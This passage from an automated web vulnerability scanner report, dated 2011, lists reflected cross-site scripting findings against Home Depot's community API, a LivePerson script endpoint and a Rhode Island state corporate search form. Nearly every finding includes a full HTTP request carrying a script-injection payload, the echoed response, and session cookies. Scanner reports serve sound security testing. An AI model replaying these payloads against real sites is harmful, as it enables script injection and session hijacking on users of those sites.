jsonp13104885296198d1a9<img src=a onerror=alert(1)>02e074b4b25({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/build","id":{"type":"string","$":"build"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"string","$":"
...[SNIP]...

3.6. http://community.homedepot.com/restapi/vc/boards/id/lawns [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.homedepot.com
Path:	/restapi/vc/boards/id/lawns

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1e87e<img%20src%3da%20onerror%3dalert(1)>eba813800c3 was submitted in the callback parameter. This input was echoed as 1e87e<img src=a onerror=alert(1)>eba813800c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/lawns?xslt=json.xsl&callback=jsonp13104885296211e87e<img%20src%3da%20onerror%3dalert(1)>eba813800c3 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 637
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp13104885296211e87e<img src=a onerror=alert(1)>eba813800c3({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/lawns","id":{"type":"string","$":"lawns"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"string","$":"
...[SNIP]...

3.7. http://community.homedepot.com/restapi/vc/boards/id/replace [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.homedepot.com
Path:	/restapi/vc/boards/id/replace

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f5c71<img%20src%3da%20onerror%3dalert(1)>070705f0df3 was submitted in the callback parameter. This input was echoed as f5c71<img src=a onerror=alert(1)>070705f0df3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/replace?xslt=json.xsl&callback=jsonp1310488529617f5c71<img%20src%3da%20onerror%3dalert(1)>070705f0df3 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 608
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp1310488529617f5c71<img src=a onerror=alert(1)>070705f0df3({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/replace","id":{"type":"string","$":"replace"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"string","
...[SNIP]...

3.8. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload ad89c%0aa7074f0f5d5 was submitted in the site parameter. This input was echoed as ad89c
a7074f0f5d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /visitor/addons/deploy.asp?site=57386690ad89c%0aa7074f0f5d5&d_id=THD HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQSATCQQT=POMBMBKDCKNCLFAFAHDBCMPC; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 57386690ad89c
a7074f0f5d5
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

3.9. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [ActiveFlagCrit parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the ActiveFlagCrit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4392f"><script>alert(1)</script>558a4aa6fa8 was submitted in the ActiveFlagCrit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y4392f"><script>alert(1)</script>558a4aa6fa8&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title>

<style type="text/css">
.label {
font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=ActiveFlagCrit value="Y4392f"><script>alert(1)</script>558a4aa6fa8">
...[SNIP]...

3.10. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [Address parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the Address request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 843a1"><script>alert(1)</script>d889694b614 was submitted in the Address parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=843a1"><script>alert(1)</script>d889694b614&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&OldFiscalDay=&NewFormation=&FilingNum=&Batc
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title>

<style type="text/css">
.label {
font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=Address value="843a1"><script>alert(1)</script>d889694b614">
...[SNIP]...

3.11. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [AgentName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the AgentName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6fa"><script>alert(1)</script>08ee8de438 was submitted in the AgentName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=7e6fa"><script>alert(1)</script>08ee8de438&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&OldFiscalDay=&NewFormation=&Filing
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8554
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title>

<style type="text/css">
.label {
font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=AgentName value="7e6fa"><script>alert(1)</script>08ee8de438">
...[SNIP]...

3.12. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [EntityName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the EntityName request parameter is copied into the HTML document as plain text between tags. The payload dbe0c<script>alert(1)</script>9f9c99aea8 was submitted in the EntityName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xssdbe0c<script>alert(1)</script>9f9c99aea8&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&Fi
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8592
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title>

<style type="text/css">
.label {
font-family: "Courier New", Courier, monospac
...[SNIP]...
<u>xssdbe0c<script>alert(1)</script>9f9c99aea8</u>
...[SNIP]...

3.13. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [EntitySearchMethod parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the EntitySearchMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6e30"><script>alert(1)</script>4cfbec7b07a was submitted in the EntitySearchMethod parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=Be6e30"><script>alert(1)</script>4cfbec7b07a&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFe
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8543
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title>

<style type="text/css">
.label {
font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=SearchMethod value="Be6e30"><script>alert(1)</script>4cfbec7b07a">
...[SNIP]...

3.14. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [FirstName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the FirstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7350f"><script>alert(1)</script>44583332d2b was submitted in the FirstName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=7350f"><script>alert(1)</script>44583332d2b&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityNam
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title>

<style type="text/css">
.label {
font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=FirstName value="7350f"><script>alert(1)</script>44583332d2b">
...[SNIP]...

3.15. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [LastName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the LastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e9bf"><script>alert(1)</script>9f858503452 was submitted in the LastName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=9e9bf"><script>alert(1)</script>9f858503452&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&Old
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title>

<style type="text/css">
.label {
font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=LastName value="9e9bf"><script>alert(1)</script>9f858503452">
...[SNIP]...

3.16. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [MiddleName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the MiddleName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8668e"><script>alert(1)</script>3a488b53b99 was submitted in the MiddleName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=8668e"><script>alert(1)</script>3a488b53b99&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscal
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title>

<style type="text/css">
.label {
font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=MiddleName value="8668e"><script>alert(1)</script>3a488b53b99">
...[SNIP]...

3.17. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [Purpose parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the Purpose request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d359"><script>alert(1)</script>3a9aab12ca4 was submitted in the Purpose parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

